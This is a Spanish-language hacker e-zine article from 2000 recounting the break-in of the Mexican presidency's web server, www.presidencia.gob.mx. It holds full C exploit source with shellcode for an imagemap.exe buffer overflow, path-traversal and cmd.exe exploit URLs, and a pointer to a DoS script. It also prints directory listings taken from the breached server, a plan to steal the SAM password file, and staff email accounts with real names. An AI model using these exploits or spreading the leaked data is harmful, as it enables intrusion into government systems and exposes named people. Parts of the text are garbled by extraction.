========================================================================= -----------------------------------------------------------------------------09------( Hackeando www.presidencia.gob.mx )-----------------------------RM-11]------------------[ alt3kx_H3z ]----------------------------------------------[alt3kx_h3z@raza-mexicana.

org]-------------------------

-= HACKEANDO PRESIDENCIA.GOB.MX =www.presidencia.gob.mx Por alt3kx! Comentarios alt3kx_h3z@raza-mexicana.org (c) 2000 alt3kx_h3z Definitivamente, los grandes servidores como el que vamos a comentar contiene diferentes vulnerabilidades sobre todo en aspectos de configuracin bajo el IIS (Internet information server ) y tambin en aspectos en servicios como el SAMBA y FTP, definitivamente estamos hablando de WITENDO (Windows NT 4.0 server en este caso). En este articulo trataremos de abarcar algunas vulnerabilidades que contiene o contena este servidor llamado "www.presidencia.gob.mx", cabe mencionar que no mostrare los detalles a fondo, pues existen demasiados kiddies por ah queriendo joder servidores y expresando mil y una idioteces, (ejemplo Cyberpunk y Machinfer) solo basta con visitar la pgina www.atrition.org pagina la cual se dedica a publicar las WEbcracks que existen alrededor del mundo. Empezare explicando algunas vulnerabilidades que por aos se han encontrado vigentes en este servidor, (digo por aos pues he entrado varias veces al servidor sin ser detectado), bien inicio un scan localizando vulnerabilidades: bash# ./a www.presidencia.gob.mx HTTP version for www.presidencia.gob.mx HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://11.0.0.11/index.html Date: Thu, 09 Nov 2000 02:42:37 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Thu, 09 Nov 2000 00:53:48 GMT ETag: "0b6c284e749c01:217d"

Bien en esta parte estamos detectando que el servidor cuenta con el servicio de IIS versin 4.0 que por ende, deducimos que tiene abierto el puerto 80 el cual podemos ejecutar comandos si el servidor lo deja, en modo perl, en este modo algunos servidores pueden ejecutar comandos y la

mayora de los bugs se encuentra en las funciones de open () y system() sobre todo en servidores NT en el campo sobre la funciones en scripts de CGI (Comun Gateway Interface). En C, las funciones open( ) y system( ) sirven para abrir un shell que procese los comandos que se le pasen como argumentos. Por su parte, en Perl, adems de las funciones anteriores, se dispone de open ( ) con tubera o entubado "|", exec( ) y eval( ), as como de las comillas hacia atrs "`". pequeo ejemplo: exec("/usr/bin/ls","ls","/",0); <--podremos paginar la raiz si tenemos suerte en equipos Linux o Unix. >Para mayor referencia leer "HACk PCWeek"< Bien el scan a localizado diferentes vulnerabilidades bastante interesantes, las cuales nos podrn dar acceso al este servidor :-) ... (1)/_vti_bin/shtml.dll : (2)/_vti_bin/shtml.exe : Estos dos servicios son proporcionados por FRONT PAGE en la mayora de las versiones, el error (1) con suerte podremos llamar y paginar la raz no en todos los casos funciona, para el error (2) existe un DoS (Denial Of Service) yo mismo he realizado el programa basado en perl para explotar esta vulnerabilidad, bsicamente existe un llamado en el puerto 80 con la cadena /_vti_bin/shtml.exe ejecutndose remotamente en varias ocasiones causando as que el servidor no responda a la las peticiones y se colapse en tan solo unos minutos. Una vez ejecutado este script al recargar "Refresh" la pagina en tu browser, no desplegara nada, "Ellos vern las pantalla Azul jeje "Screen Death". El script que hemos comentado se encuentran en la siguientes webs con el siguiente nombre: fpage-DoS.pl http://www.raza-mexicana.org http://www.hertmx.org (3)/cgi-bin/imagemap.exe Otro error en servicios de FRONT PAGE , este ejecutable hace referencia a las imagenes ke puedan estar hospedadas en la web, bsicamente el imagemap.exe se incluye en scripts bajo Java, Perl y algunos casos en php. En este error bsicamente es un llamado para ejecutar comandos remotamente, con suerte podremos agregar un "dir" ejecutando la cadena siguiente: "/winnt/system32/cmd.exe?/c+dir"

Para este caso he logrado conseguir como se estructura el servidor: http://www.presidencia.gob.mx File C:\Inetpub\wwwroot\ The filename, directory name, or volume label syntax is incorrect Ahora sabemos que la web se encuentra en la unidad C:\ en el directorio wwwroot este directorio es el default de los servicios de IIS. Aqu te proporciono el cdigo fuente basado en c/c++ para ejecutar algunos comandos remotos donde hallas localizado el "imagemap.exe": ------------------------------------cortar------------------------#include <stdio.h> #include <string.h> #include <windows.h> #include <winsock.h> #define #define #define #define MAXBUF RETADR JMPADR HTTP_PORT 2000 348 344 80 0xBFDE0000, 0xBFE30000, 0xBFE90000, 0xBFF20000, 0xBFF70000, 0xBFDE5FFF, 0xBFE42FFF, 0xBFE95FFF, 0xBFF46FFF, 0xBFFC5FFF,

unsigned int mems[]={ 0xBFB50000, 0xBFB72FFF, 0xBFE00000, 0xBFE0FFFF, 0xBFE80000, 0xBFE85FFF, 0xBFEA0000, 0xBFF1EFFF, 0xBFF50000, 0xBFF60FFF, 0xBFFC9000, 0xBFFE2FFF, 0,0};

unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe"; unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p; if ((adr&0xff)==0) continue;

if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int i,ip,p1,p2; static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs; if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)HTTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs>h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; for (i=0;;i+=2){ if (mems[i]==0) return FALSE; if ((ip=search_mem((unsigned char *)mems[i], (unsigned char *)mems[i+1],0xff,0xe3))!=0) break; } buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06; strcat(exploit_code,cmdbuf); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress;

exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); closesocket(sock); printf("Done.\n"); return FALSE; } ------------------------------------cortar-------------------------

Los componentes afectados son HTIMAGE.EXE e IMAGEMAP.EXE, que se ocupan de soportar el "image mapping" o "mapeado de imgenes" desde servidores compatibles con CERN y NCSA, respectivamente. A nivel prctico, "imagemapping" integra los hiperenlaces dentro de las imgenes y permite crear enlaces en determinadas areas de un grafico. Un ejemplo tpico podra ser el de un mapa grafico en el que, al seleccionar uno de los estados delimitados, nos traslada a otra pgina con informacin sobre la regin escogida. La vulnerabilidad a la que hoy nos referimos consiste en el conocido ataque por desbordamiento de buffer. En concreto, un excesivo tamao en los argumentos que se les pasa como parmetros a estos componentes, puede provocar el acceso no controlado a la memoria del sistema. Una vez que se produce el desbordamiento de buffer, los datos sobrantes que acceden de forma descontrolada a la memoria pueden bloquear el sistema si no pueden interpretarse como comandos o ejecutarse las instrucciones que representan. Una solucin que propone Microsoft (muy pequea) es la eliminacin de estos archivos, mediante una bsqueda sencilla como dar "Buscar"-"Archivos y carpetas" con los nombres de imagemap.exe y htimage.exe. La perdida de estos archivos afecta solo a la funcionalidad cuando se utilicen hiperenlaces grficos tipo CERN O NCSA y el cliente mantenga un navegador muy antiguo, lo que es muy poco probable.

(4)/Default.asp Error en scripts de ASP (Active Server Page), los ASP bsicamente se usan en formularios y servicios para base de datos, en los personal los he manejado poco, pues ya no he programado sobre ASP, pero podemos entender que se hospedan en los servicios del IIS por default, con ASP podremos lograr demasiadas cosas, lo importante de los ASP es lograr ver el cdigo fuente para as insertar cadenas.

Hablando un poco sobre el error (4), existe la manera de tener acceso a los archivos del sistema remotamente, el trabajo consiste en localizar los directorios posibles para ejecucin, el problema es causado por el IIS, que no verifica la autentificacin sobre los comandos transcritos sobre el servicio, el error es bsicamente agregar comandos para obtener respuesta del servidor ejemplo: http://www.presidencia.gob.mx/default.asp%20.pl IIS recibe esta respuesta y asume que es para un perl script, perl cuando recibe la instruccin para ejecutar default.asp, deja pasarla como una instruccin con extension.pl, con esto podremos engaar al servidor para ejecutar algunos otros comandos ejemplo: http://www.presidencia.gob.mx/passwd.txt%20.pl Si tenemos suerte podremos obtener un error como este: C:\Inetpub\scripts\passwd.txt line 1 Algunos ejemplos en ASP: [Codebrws.asp]: Originalmente localizado en la siguiente ruta: /iissamples/exair/howitworks/codebrws.asp? Exploit: SERVER/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../ ../../../../ARCHIVO [Showcode.asp]: Originalmente localizado en la siguiente ruta: /msadc/samples/selector/showcode.asp Exploit: SERVER/msadc/samples/selector/showcode.asp?source=/msadc/Samples/../../.. /../../ARCHIVO Codigo fuente del ASP (showcode.asp) ------------------------------------------------------------------------------<SCRIPT LANGUAGE=VBScript RUNAT=Server> REM REM REM REM REM REM REM REM *************** NOTICE **************** * This file may only be used to view * * source code of .asp files in the * * AdvWorks or ASP Sample directory. * * If you wish to change the security * * on this, modify or remove this * * function. * ***************************************

FUNCTION fValidPath (ByVal strPath) If InStr(1, strPath, "/Msadc/", 1) Then fValidPath = 1

Else fValidPath = 0 End If END FUNCTION </SCRIPT> <SCRIPT LANGUAGE=VBScript RUNAT=Server> REM Returns the minimum number greater than 0 REM If both are 0, returns -1 FUNCTION fMin (iNum1, iNum2) If iNum1 = 0 AND iNum2 = 0 Then fMin = -1 ElseIf iNum2 = 0 Then fMin = iNum1 ElseIf iNum1 = 0 Then fMin = iNum2 ElseIf iNum1 < iNum2 Then fMin = iNum1 Else fMin = iNum2 End If END FUNCTION </SCRIPT> <SCRIPT LANGUAGE=VBScript RUNAT=Server> FUNCTION fCheckLine (ByVal strLine) fCheckLine = 0 iTemp = 0 iPos = InStr(strLine, "<" & "%") If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 1 End If iPos = InStr(strLine, "%" & ">") If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 2 End If iPos = InStr(1, strLine, "<" & "SCRIPT", 1) If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 3 End If iPos = InStr(1, strLine, "<" & "/SCRIPT", 1) If fMin(iTemp, iPos) = iPos Then iTemp = iPos fCheckLine = 4 End If END FUNCTION </SCRIPT>

<SCRIPT LANGUAGE=VBScript RUNAT=Server> SUB PrintHTML (ByVal strLine) iSpaces = Len(strLine) - Len(LTrim(strLine)) i = 1 While Mid(Strline, i, 1) = Chr(9) iSpaces = iSpaces + 5 i = i + 1 Wend If iSpaces > 0 Then For i = 1 to iSpaces Response.Write(" ") Next End If iPos = InStr(strLine, "<") If iPos Then Response.Write(Left(strLine, iPos - 1)) Response.Write("<") strLine = Right(strLine, Len(strLine) - iPos) Call PrintHTML(strLine) Else Response.Write(strLine) End If END SUB </SCRIPT> <SCRIPT LANGUAGE=VBScript RUNAT=Server> SUB PrintLine (ByVal strLine, iFlag) Select Case iFlag Case 0 Call PrintHTML(strLine) Case 1 iPos = InStr(strLine, "<" & "%") Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("<FONT COLOR=#ff0000>") Response.Write("<%") strLine = Right(strLine, Len(strLine) - (iPos Call PrintLine(strLine, fCheckLine(strLine)) Case 2 iPos = InStr(strLine, "%" & ">") Call PrintHTML(Left(strLine, iPos -1)) Response.Write("%>") Response.Write("</FONT>") strLine = Right(strLine, Len(strLine) - (iPos Call PrintLine(strLine, fCheckLine(strLine)) Case 3 iPos = InStr(1, strLine, "<" & "SCRIPT", 1) Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("<FONT COLOR=#0000ff>") Response.Write("<SCRIPT") strLine = Right(strLine, Len(strLine) - (iPos Call PrintLine(strLine, fCheckLine(strLine)) Case 4 iPos = InStr(1, strLine, "<" & "/SCRIPT>", 1) Call PrintHTML(Left(strLine, iPos - 1)) Response.Write("</SCRIPT>") Response.Write("</FONT>") strLine = Right(strLine, Len(strLine) - (iPos

+ 1))

+ 1))

+ 6))

+ 8))

Call PrintLine(strLine, fCheckLine(strLine)) Case Else Response.Write("FUNCTION ERROR -- PLEASE CONTACT ADMIN.") End Select END SUB </SCRIPT> <% strVirtualPath = Request("source") %>

<HTML> <HEAD><TITLE>View Active Server Page Source</TITLE></HEAD> <BODY BGCOLOR=#FFFFFF> <FONT FACE="Verdana, Arial, Helvetica" SIZE=6> <TABLE> <TR> <TD><IMG SRC="/Msadc/Samples/Selector/asp.gif" WIDTH=200 HEIGHT=93 BORDER=0 ALT="Active Server Page logo"></TD> <TD><FONT FACE="Verdana, Arial, Helvetica" SIZE=6>View ASP Source</FONT></TD> </TR> </TABLE> <FONT FACE="Verdana, Arial, Helvetica" SIZE=2> Go Back to <a href="<%=strVirtualPath%>"><%=strVirtualPath%></A> <BR> <hr> <% If fValidPath(strVirtualPath) Then strFilename = Server.MapPath(strVirtualPath) Set FileObject = Server.CreateObject("Scripting.FileSystemObject") Set oInStream = FileObject.OpenTextFile (strFilename, 1, FALSE ) While NOT oInStream.AtEndOfStream strOutput = oInStream.ReadLine Call PrintLine(strOutput, fCheckLine(strOutput)) Response.Write("<BR>") Wend Else Response.Write("<H1>View Active Server Page Source-- Access Denied</H1>") End If %> </BODY> </HTML> >Lectura recomendada ASP PROGRAMING MS< (5)/msadc/msadcs.dll Se ha comentado mucho sobre este error en varias ocasiones por lo cual solo hare referencia al artculo que realizo _0x90_ en la e-zine de razamexicana en la raza#10, Te pongo la direccin exacta para que puedas leer este buen artculo: http://www.raza-mexicana.org/revista/html/raza10-2.html#iisrds

He puesto las vulnerabilidades mas conocidas he importantes sobre este servidor, a partir de este momento posteare algunos archivos que se encuentran en los directorios ms importantes bajo el servidor NT 4.0 con servicio IIS 4.0 del servidor www.presidencia.gob.mx. Tecleando C:\dir C:\Inetpub\scripts se localiza lo siguiente: Directory of C:\Inetpub\scripts10/28/00 07:31p 10/28/00 07:31p <DIR> .. 04/07/99 08:57p <DIR> buscar 4 File(s) 208,144 bytes 579,322,880 bytes free Tecleando C:\dir C:\Inetpub se localiza lo siguiente: Directory of c:\Inetpub 10/05/00 10/05/00 10/27/00 08/31/00 10/27/00 04/07/99 12/24/99 06/03/99 10/28/00 10/24/00 11:48p <DIR> . 11:48p <DIR> .. 01:12p <DIR> catesp 12:53p <DIR> catexp 01:13p <DIR> cating 10:40p <DIR> catkids 12:01p <DIR> iissamples 01:31p <DIR> Repaldos 07:31p <DIR> scripts 09:03a <DIR> wwwroot 10 File(s) 0 bytes 579,322,880 bytes free <DIR> .

Quiero ver que hay desde raiz :-) Tecleando C:\dir C:\ se localiza lo siguiente: Directory 03/31/99 03/31/99 09/03/00 09/02/00 10/05/00 04/07/99 10/24/00 04/05/99 08/31/00 07/19/99 04/05/00 10/28/00 10/28/00 10/28/00 of c:\10/16/00 08:02p <DIR> Almacen 05:00a 0 AUTOEXEC.BAT 05:00a 0 CONFIG.SYS 03:41p <DIR> especial 08:14p 372 FRONTPG.LOG 11:48p <DIR> Inetpub 09:12p <DIR> List 06:36p 67,108,864 pagefile.sys 11:42a <DIR> php3 08:36p <DIR> Program Files 12:03p <DIR> ssinst 10:17a <DIR> StatisticsServer 10:23a <DIR> TEMP 07:38p <DIR> WINNT 10:25a 469,869 winzip.log 15 File(s) 67,579,105 bytes 579,322,880 bytes free

Tecleando C:\dir C:\WINNT se localiza lo siguiente: Directory 10/28/00 02/17/98 02/17/98 08/31/00 08/31/00 08/31/00 08/31/00 03/29/99 10/13/96 03/29/99 05/08/98 10/13/96 12/29/98 12/24/99 03/31/99 03/31/99 03/29/99 08/31/00 09/11/00 11/18/99 05/08/98 08/31/00 03/29/99 04/08/00 08/31/00 03/29/99 03/29/99 11/18/99 08/31/00 12/29/98 05/18/98 03/29/99 07/04/99 12/29/98 10/13/96 10/13/96 07/04/99 10/19/00 04/08/00 10/27/00 05/28/99 07/05/99 11/03/97 03/29/99 12/19/96 10/13/96 10/13/96 10/24/00 08/31/00 08/15/98 11/18/99 10/13/96 03/29/99 08/30/99 of c:\WINNT10/28/00 07:38p 07:38p <DIR> 10:51a 20,480 10:53a 690,534 08:30p 6,305 08:38p 10,018 08:30p 0 08:36p 0 01:16p 21,590 07:38p 5,328 01:15p <DIR> 12:00a 84,032 07:38p 82,944 11:54p 49,424 12:01p <DIR> 04:49a <DIR> 05:00a 0 01:14p <DIR> 08:37p <DIR> 07:24p 1,576,127 11:04a 237,328 12:00a 103,424 08:37p 100,864 01:28p 276 10:05a <DIR> 08:37p 26,896 01:14p <DIR> 01:15p 128,985 11:04a 150,898 08:37p 17,655 11:07p 6,550 12:00a 14,017 01:20p <DIR> 10:55a 1,729 11:51p 169,232 07:38p 157,044 07:38p 157,044 11:52a 2,670 01:27p 185 10:05a <DIR> 09:47p 165 11:25a <DIR> 02:31p <DIR> 04:48p 1,405 01:31p 16,384 12:00a 49,094 07:38p 67,328 07:38p 45,328 06:27p 2,304 08:52p 5,702 01:53p 2,780 11:04a 123,152 07:38p 34,816 11:04a <DIR> 03:43a <DIR> <DIR> . .. aceclcab.exe aceclnt.cab Active Setup Log.BAK Active Setup Log.txt AdvpackExt.BAK AdvpackExt.log Bind List Log.txt black16.scr CatRoot Channel Screen Saver.SCR clock.avi clspack.exe cm32 Config control.ini COOKIES Cursors drwtsn32.log EXPLORER.EXE EXTRAC32.EXE extract.exe frontpg.ini Help hh.exe History IE4 Setup Log.Txt IEHELP.EXE iextract.exe jautoexp.dat JAUTOEXP.INI Java javainst.log jview.exe lanma256.bmp lanmannt.bmp MDACSET.log mdm.ini Media mmc.INI Mon msapps MSDFMAP.INI MSIMGSIZ.DAT MSO97.ACL network.wri NOTEPAD.EXE ODBC.INI ODBCINST.INI php3.ini POLEDIT.EXE printer.wri Profiles Proyectos

10/13/96 07/23/98 04/06/99 03/29/99 03/29/99 09/11/99 12/29/98 04/08/00 08/31/00 03/29/99 03/29/99 08/31/00 03/29/99 08/31/00 10/13/96 10/24/00 10/13/96 03/29/99 09/11/00 07/04/99 10/24/00 08/31/00 07/04/99 10/13/96 03/29/99 10/13/96 10/28/00 10/13/96 10/13/96 11/18/99 12/29/98 07/04/99 10/13/96 07/03/00 07/14/99 01/01/00 09/02/00 09/03/00 09/02/00 11/14/99 06/08/00 03/29/99 09/02/00 04/06/99 09/02/00 09/04/00 04/06/99 04/06/99 10/24/00 03/29/99 10/06/00 05/11/99 04/07/99 05/07/99 11/25/99 09/04/00 02/23/00

07:38p 02:18p 12:01p 01:20p 01:22p 05:17p 11:53p 10:05a 04:33p 11:01a 01:16p 04:33p 01:20p 08:30p 07:38p 06:36p 07:38p 01:20p 07:25p 11:08a 06:39p 08:54p 11:42a 07:38p 01:16p 07:38p 10:29a 07:38p 07:38p 11:04a 11:52p 11:08a 07:38p 11:36a 11:52a 12:03a 08:00p 01:36p 08:12p 04:56p 03:47p 07:08p 08:22p 09:49a 08:22p 11:28a 10:19a 11:04a 06:17p 01:30p 11:53a 01:35p 07:51p 10:08a 03:19p 05:30p 11:23p

71,952 REGEDIT.EXE 40,960 REGTLIB.EXE <DIR> repair 20,034 RunOnceEx Log.txt <DIR> Samples 1,004 scsE0.tmp 46,352 setdebug.exe 308 setup.old 286,720 Setup1.exe 138 setuplog.txt 956 Soft Boot Log.txt 73,216 ST6UNST.EXE <DIR> Subscriptions <DIR> system 219 system.ini <DIR> system32 32,016 TASKMAN.EXE <DIR> Temporary Internet Files 110,539,070 user.dmp 1,245 VB.INI 62 VBAddin.INI <DIR> VBE 2,659 vminst.log 24,336 vmmreg32.dll <DIR> Web 22,288 welcome.exe 423 WIN.INI 3 WINFILE.INI 256,192 WINHELP.EXE 311,056 WINHLP32.EXE 162,576 wjview.exe 0 wplog.txt 707 _DEFAULT.PIF 0 ~DF1026.tmp 0 ~DF11A2.tmp 0 ~DF17A.tmp 0 ~DF1BED.tmp 0 ~DF30.tmp 0 ~DF315D.tmp 0 ~DF3DEB.tmp 0 ~DF42C4.tmp 0 ~DF5F3F.tmp 0 ~DF61F7.tmp 0 ~DF63C8.tmp 0 ~DF654A.tmp 0 ~DF731F.tmp 0 ~DF7382.tmp 0 ~DF8C6D.tmp 0 ~DFA8E.tmp 0 ~DFB853.tmp 0 ~DFBA7A.tmp 0 ~DFBD0F.tmp 0 ~DFBF40.tmp 0 ~DFC2ED.tmp 0 ~DFCC29.tmp 0 ~DFD410.tmp 0 ~DFD6A5.tmp

04/05/99 12/06/99 07/14/99 10/06/99 05/11/99 07/20/99 09/17/00 06/08/99 05/12/99 06/25/00 07/04/99 05/26/99 06/08/99 05/11/99 03/08/00 08/10/00 05/07/99 05/04/99 06/17/99 05/07/99 09/25/00 04/10/99 08/31/00 07/04/99 07/04/99 08/25/99 11/14/99 03/01/00 10/05/99 07/04/99 04/08/99 04/14/99 04/22/99 08/26/99 08/31/99 08/03/99 04/10/99 07/21/99 12/30/99 03/29/99 03/04/00 03/03/00 11/22/99 03/29/99 08/31/00 08/31/00 10/24/00 08/31/00 04/07/99 08/31/00 09/04/00 08/30/00 09/04/00 08/24/00 02/18/00 08/31/00 04/06/00

09:25a 07:01p 11:00a 06:50p 01:40p 11:33a 04:00p 01:32p 08:51a 07:24p 11:46a 07:08p 11:10p 12:25p 08:20p 08:18p 09:53p 08:49p 10:34a 09:18a 10:38a 01:13p 05:14p 10:59a 11:55a 08:23p 03:39p 09:35p 07:30p 11:12a 12:01a 10:03p 11:22a 08:27p 12:49a 07:26p 01:09p 11:19p 11:11p 06:54p 12:43a 10:46p 04:46p 07:00p 02:26p 02:40p 06:36p 10:42p 11:49p 07:49p 11:41a 06:20p 05:36p 12:32a 04:21p 04:58p 07:16p

0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

~DFD73.tmp ~DFD849.tmp ~DFDB4C.tmp ~DFDC15.tmp ~DFDDB9.tmp ~DFDF72.tmp ~DFE17B.tmp ~DFE24D.tmp ~DFE2D9.tmp ~DFE379.tmp ~DFE56E.tmp ~DFE5DC.tmp ~DFE65E.tmp ~DFE668.tmp ~DFE6A4.tmp ~DFE6FF.tmp ~DFE709.tmp ~DFE795.tmp ~DFE817.tmp ~DFE821.tmp ~DFE83F.tmp ~DFE989.tmp ~DFEA3E.tmp ~DFEAB6.tmp ~DFEAFC.tmp ~DFEBCE.tmp ~DFEBF6.tmp ~DFED23.tmp ~DFEDF5.tmp ~DFEE1D.tmp ~DFEE3B.tmp ~DFEF22.tmp ~DFEF5E.tmp ~DFEF5F.tmp ~DFEFC2.tmp ~DFEFE0.tmp ~DFEFF4.tmp ~DFF207.tmp ~DFF473.tmp ~DFF528.tmp ~DFF55A.tmp ~DFF5DC.tmp ~DFF5FA.tmp ~DFF781.tmp ~DFF79F.tmp ~DFF7F9.tmp ~DFF867.tmp ~DFF92F.tmp ~DFF94D.tmp ~DFF9C5.tmp ~DFF9D9.tmp ~DFF9EE.tmp ~DFFA5C.tmp ~DFFA7A.tmp ~DFFAB6.tmp ~DFFB60.tmp ~DFFB7E.tmp

03/02/00 09/12/00 12/24/99 10/21/00 08/31/00 08/31/00 09/11/00 09/18/00 01/25/00 08/28/00 03/03/00 09/04/00 03/04/00 08/03/99 01/14/00 10/07/00 09/15/00 04/07/99 05/05/00 04/05/99 09/04/00 10/05/00 07/05/00 09/02/00 09/02/00

08:39p 0 ~DFFBD8.tmp 07:26p 0 ~DFFBD9.tmp 01:07p 0 ~DFFBE2.tmp 10:02a 0 ~DFFC14.tmp 08:45p 0 ~DFFC1E.tmp 12:46p 0 ~DFFC3C.tmp 07:43p 0 ~DFFC6E.tmp 05:36p 0 ~DFFC6F.tmp 03:27p 0 ~DFFC82.tmp 09:56a 0 ~DFFCBF.tmp 10:20p 0 ~DFFCE7.tmp 01:41p 0 ~DFFD2D.tmp 12:31a 0 ~DFFD55.tmp 10:02p 0 ~DFFDAF.tmp 10:03a 0 ~DFFDB9.tmp 10:58a 0 ~DFFDBA.tmp 12:29p 0 ~DFFDC3.tmp 09:21p 0 ~DFFDEB.tmp 09:57a 0 ~DFFE1D.tmp 09:39a 0 ~DFFE81.tmp 06:32p 0 ~DFFEBD.tmp 09:58a 0 ~DFFF53.tmp 10:27p <DIR> ~offfilt 08:22p 42,496 ~WRC0000.tmp 08:01p 1,536 ~WRF0000.tmp 194 File(s) 116,108,561 bytes 579,322,880 bytes free

Robemos el sam._ :-) Tecleando C:\dir C:\WINNT\repair se localiza lo siguiente: c:\winnt\repair01/01/00 04:24a <DIR> 01/01/00 04:24a <DIR> .. 10/14/96 03:38a 438 autoexec.nt 01/01/00 04:29a 2,510 config.nt 01/01/00 04:31a 15,508 default._ 01/01/00 04:31a 14,768 ntuser.da_ 01/01/00 04:31a 3,511 sam._ 01/01/00 04:31a 6,393 security._ 01/01/00 04:31a 131,946 software._ 01/01/00 04:31a 85,390 system._ 10 File(s) 260,464 bytes .

Tecleando C:\dir C:\Inetpub\scripts\buscar se localiza lo siguiente: Directory of c:\Inetpub\scripts\buscar 04/07/99 04/07/99 09/17/98 05/22/98 09/26/98 09/17/98 07/03/98 09/26/98 08:57p 08:57p 07:28p 09:44p 12:23a 07:32p 12:09p 12:23a <DIR> <DIR> 2,668 10,150 518 2,668 10,181 522 . .. basica.htm basica.htx basica.idq basica1.htm Basicaex.htx Basicaex.idq

09/17/98 09/17/98 09/17/98 04/06/99

07:38p 1,504 basicaResp.htm 07:38p 1,504 Copia de basicafuera.htm 07:28p 2,005 query.htm 10:04a <DIR> _vti_cnf 12 File(s) 31,720 bytes 579,322,880 bytes free

Quiero ver que hay en el Program Files :-) Tecleando C:\dir C:\progra~1 se localiza lo siguiente: Directory of c:\progra~1 08/31/00 08/31/00 07/04/99 10/24/00 12/24/99 03/29/99 08/31/00 03/29/99 07/04/99 12/24/99 03/11/00 08/31/00 03/29/99 07/12/99 07/04/99 03/14/00 04/08/00 09/06/99 08:36p <DIR> . 08:36p <DIR> .. 11:05a <DIR> Common Files 04:46p <DIR> Explora 12:00p <DIR> MarkVis 01:28p <DIR> Microsoft FrontPage 08:33p <DIR> Microsoft Office 01:26p <DIR> Microsoft Script Debugger 11:07a <DIR> Microsoft Visual Studio 12:02p <DIR> Mts 01:28p <DIR> NT OBJECTives, Inc 08:33p <DIR> Office2000 11:01a <DIR> Plus! 02:43p <DIR> Respaldos 11:07a <DIR> Web Publish 11:23a <DIR> WEBTREND 10:05a <DIR> Windows NT 10:53a <DIR> WinZip 18 File(s) 0 bytes 579,257,344 bytes free

K00l tienen Office2000, Front Page, y Winzip :X Quiero saber que hay en Microsoft FrontPage Tecleando C:\dir C:\progra~1\micros~1 se localiza lo siguiente: Directory of c:\progra~1\micros~1 03/29/99 03/29/99 03/29/99 03/29/99 03/29/99 01:28p <DIR> . 01:28p <DIR> .. 01:28p 551 FrontPage Server Administrator.lnk 01:28p <DIR> temp 01:28p <DIR> version3.0 5 File(s) 551 bytes 579,191,808 bytes free

Quiero saber que hay dentro de version3.0 Tecleando C:\dir C:\progra~1\micros~1\version3.0 se localiza lo siguiente: Directory 03/29/99 03/29/99 03/29/99 03/29/99 03/29/99 03/29/99 03/28/00 03/29/99 03/29/99 of c:\progra~1\micros~1\version3.0 01:28p <DIR> . 01:28p <DIR> .. 01:26p <DIR> admin 01:26p <DIR> bin 01:26p <DIR> isapi 01:26p <DIR> serk 08:58p <DIR> servsupp 01:28p <DIR> temp 01:28p <DIR> _vti_bin 9 File(s) 0 bytes 579,191,808 bytes free

------------------------------------------------------------Algunos Mails/Usuarios sobre el dominio presidencia.gob.mx ------------------------------------------------------------Account Name :abc@presidencia.gob.mx

The abc account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name :Secretaria Privada : :anonimo

Account Name

:abrun@presidencia.gob.mx

The abrun account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name :Consejeria Juridica : :Ana Brun Iarritu

Account Name

:acast@presidencia.gob.mx

